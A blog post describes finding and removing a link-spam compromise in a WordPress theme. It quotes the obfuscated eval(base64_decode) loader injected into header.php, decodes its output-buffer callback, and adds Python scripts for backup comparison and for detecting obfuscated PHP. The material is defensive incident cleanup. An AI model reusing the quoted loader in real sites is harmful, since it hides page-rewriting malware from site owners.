My WordPress blog had been hacked. It displayed ads for stupid things in the far lower right corner of some blog pages. It looks like it displayed ads on just 1 in 10 of my pages, especially “Category” pages. You might want to take a peek at your own WordPress blog to make sure it hasn’t happened to you.
Here’s where the bad code was and how I fixed it.
The header.php file of my theme had been altered. It began:
<?define('USE_DIRA', '/blog/wp-content/themes/default/images/'); @eval(@base64_decode("ZnVuY3Rpb24gY2FsbGJhY2soJGNoZWUpe3JlcXVpcmUoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS5VU0VfRElSQS4iNDAzLnBocCIpO3JldHVybiAoJGNoZWUpO31vYl9zdGFydCgiY2FsbGJhY2siKTs="));?>
That code was obviously pulling something in from my /blog/wp-content/themes/default/images/ directory. Decoding the base64 string gives:

function callback($chee){require($_SERVER['DOCUMENT_ROOT'].USE_DIRA."403.php");return ($chee);}ob_start("callback");

So it registers an output-buffer callback for the whole page. When WordPress finishes rendering, the callback require()s 403.php, and because a file included inside a function shares that function’s local scope, 403.php can read and rewrite $chee, the complete page HTML, before it is returned and sent to the browser. That is how the links got into the pages without the string “403.php” appearing in plain text anywhere in the theme.
Curiously, the “modified date” on the header.php file must have been hacked too. The file has a “last modified” date of April 2009, but the backup of my website from October 2010 doesn’t have the spamming code, so the hacked code must have been added more recently than that. Resetting a timestamp is trivial for anyone who can already write the file (touch -r copies another file’s timestamps), so when hunting for tampered files, compare contents against a known-good backup rather than sorting by modification date.
Two files had been added to the /blog/wp-content/themes/default/images/ directory on the blog: 403.php and links.db.
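A quick way to do that backup comparison, added here as an example rather than anything from the original post: hash every file in the live theme and in the backup copy and diff the two sets, so a backdated timestamp changes nothing. The directory layout, file contents and the April 2009 timestamp below are constructed to mirror the case described above; the placeholder 403.php and links.db are stand-ins, not the real dropped files.

```python
import hashlib
import os
import tempfile
import time


def hash_tree(root):
    """Map relative path -> SHA-256 of content for every file under root.
    Deliberately ignores mtimes: anyone who can write the file can reset them."""
    digests = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                digests[rel] = hashlib.sha256(fh.read()).hexdigest()
    return digests


def compare_trees(backup_root, live_root):
    """Classify the live tree against a known-good backup: added, modified, removed."""
    backup = hash_tree(backup_root)
    live = hash_tree(live_root)
    return {
        "added": sorted(set(live) - set(backup)),
        "removed": sorted(set(backup) - set(live)),
        "modified": sorted(p for p in live if p in backup and live[p] != backup[p]),
    }


def mtime_year(path):
    """Year from the filesystem mtime, to show how misleading it can be."""
    return time.localtime(os.path.getmtime(path)).tm_year


# Constructed sample mirroring the post: a clean October 2010 backup of the
# default theme and the live copy after the compromise. File contents are
# stand-ins; only the file names match the real case.
CLEAN_HEADER = "<?php ?><!DOCTYPE html>\n<html><head><title>blog</title></head>\n"
INJECTED_LINE = ("<?php define('USE_DIRA', '/blog/wp-content/themes/default/images/'); "
                 "@eval(@base64_decode('...')); ?>\n")  # payload elided in this sample


def build_sample():
    base = tempfile.mkdtemp(prefix="wp-compare-")
    backup = os.path.join(base, "backup-2010-10", "wp-content", "themes", "default")
    live = os.path.join(base, "live", "wp-content", "themes", "default")
    for root in (backup, live):
        os.makedirs(os.path.join(root, "images"))
        with open(os.path.join(root, "images", "logo.gif"), "wb") as fh:
            fh.write(b"GIF89a")  # untouched asset, identical in both trees
    with open(os.path.join(backup, "header.php"), "w") as fh:
        fh.write(CLEAN_HEADER)
    with open(os.path.join(live, "header.php"), "w") as fh:
        fh.write(INJECTED_LINE + CLEAN_HEADER)
    with open(os.path.join(live, "images", "403.php"), "w") as fh:
        fh.write("<?php /* stand-in for the dropped SAPE client */ ?>")
    with open(os.path.join(live, "images", "links.db"), "w") as fh:
        fh.write("")  # stand-in for the link cache
    # Backdate the tampered header to April 2009, as in the post.
    april_2009 = time.mktime((2009, 4, 1, 0, 0, 0, 0, 0, -1))
    os.utime(os.path.join(live, "header.php"), (april_2009, april_2009))
    return backup, live


if __name__ == "__main__":
    backup_dir, live_dir = build_sample()
    report = compare_trees(backup_dir, live_dir)
    for kind in ("added", "modified", "removed"):
        for rel in report[kind]:
            year = mtime_year(os.path.join(live_dir, rel)) if kind != "removed" else "-"
            print(f"{kind:9s} {rel}  (mtime year: {year})")
```

Run against a real install, point the two arguments of compare_trees at the extracted backup and the live document root; header.php is reported as modified even though its mtime still says 2009, and the two dropped files show up as added.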
Here are the most suspicious parts of 403.php:
“SAPE” is a known piece of malware: sape.ru is a Russian paid-link network, and the “SAPE client” code dropped onto compromised sites is what injects its paid links into pages. links.db is that client’s local cache of the links it has been told to display, which is why it was sitting next to 403.php.
You should never have any eval(base64_decode(...)) code in your WordPress installation. Legitimate themes and plugins have no reason to hide their source, so it’s almost always some piece of code trying to avoid being noticed. The same goes for eval() wrapped around gzinflate(), gzuncompress() or str_rot13(), and for any .php file sitting in a directory that should only hold images or uploads.
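An added example (not from the original post) of the check described above: a small scanner that walks a WordPress install, flags eval() fed by a decoder, decodes any base64 literal handed to base64_decode() so you can read what it really does, and flags PHP files living under asset directories. The injected header line is copied verbatim from the post; the list of asset directory names and the sample theme directory it builds are assumptions for illustration.

```python
import base64
import binascii
import os
import re
import sys
import tempfile

# The line found at the top of header.php in the post, payload copied verbatim.
INJECTED_HEADER = (
    "<?define('USE_DIRA', '/blog/wp-content/themes/default/images/'); "
    "@eval(@base64_decode(\"ZnVuY3Rpb24gY2FsbGJhY2soJGNoZWUpe3JlcXVpcmUoJF9TRVJWRVJbJ0RPQ1VN"
    "RU5UX1JPT1QnXS5VU0VfRElSQS4iNDAzLnBocCIpO3JldHVybiAoJGNoZWUpO31v"
    "Yl9zdGFydCgiY2FsbGJhY2siKTs=\"));?>"
)

# eval() fed by a decoder or decompressor is the signature of code hiding itself.
EVAL_RE = re.compile(
    r"@?eval\s*\(\s*@?(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)
# A quoted base64 literal handed straight to base64_decode(); only this form is decoded here.
B64_ARG_RE = re.compile(r"base64_decode\s*\(\s*[\"']([A-Za-z0-9+/=\s]+)[\"']\s*\)", re.I)
# Assumption: these theme directories should hold assets, never executable PHP.
ASSET_DIRS = {"images", "img", "css", "js", "fonts", "uploads", "cache"}


def decode_base64_payloads(source):
    """Decode every quoted base64 literal passed to base64_decode() in a PHP source string."""
    out = []
    for m in B64_ARG_RE.finditer(source):
        raw = re.sub(r"\s+", "", m.group(1))
        try:
            out.append(base64.b64decode(raw, validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            out.append("<undecodable base64: %s...>" % raw[:32])
    return out


def inspect_php(source):
    """Return findings for one PHP source string; an empty dict means nothing suspicious."""
    findings = {}
    wrappers = [m.group(1).lower() for m in EVAL_RE.finditer(source)]
    if wrappers:
        findings["eval_wrappers"] = wrappers
        decoded = decode_base64_payloads(source)
        if decoded:
            findings["decoded"] = decoded
    return findings


def scan_tree(root):
    """Walk an install; report obfuscated PHP and PHP files hiding under asset directories."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                findings = inspect_php(fh.read())
            if any(part.lower() in ASSET_DIRS for part in rel.split("/")[:-1]):
                findings["php_in_asset_dir"] = True
            if findings:
                report[rel] = findings
    return report


def make_sample_install():
    """Constructed theme directory mirroring the post: tampered header, dropped 403.php."""
    theme = tempfile.mkdtemp(prefix="wp-scan-")
    os.makedirs(os.path.join(theme, "images"))
    with open(os.path.join(theme, "header.php"), "w") as fh:
        fh.write(INJECTED_HEADER + "\n<!DOCTYPE html>\n")
    with open(os.path.join(theme, "index.php"), "w") as fh:
        fh.write("<?php get_header(); ?>\n")  # clean file, should not be reported
    with open(os.path.join(theme, "images", "403.php"), "w") as fh:
        fh.write("<?php /* stand-in for the dropped file */ ?>\n")
    return theme


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else make_sample_install()
    for rel, findings in sorted(scan_tree(target).items()):
        print(rel)
        for key, value in findings.items():
            print(f"  {key}: {value}")
```

Pass the document root as the first argument to scan a real install. Decoding the literal is what turns a meaningless blob into the readable ob_start("callback") trick, which is the part you need to see before deciding what else the attacker touched.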
I removed the malicious code from my header.php and deleted 403.php and links.db from the default theme. Done.
Cleaning out the visible payload is the minimum, though: whoever planted it needed write access to the theme to get it there, so changing the WordPress and hosting/FTP passwords, updating WordPress and every plugin, and checking the rest of the install (wp-config.php, plugins, uploads) for other dropped files is worth doing before calling it fixed.
Update: read the comments!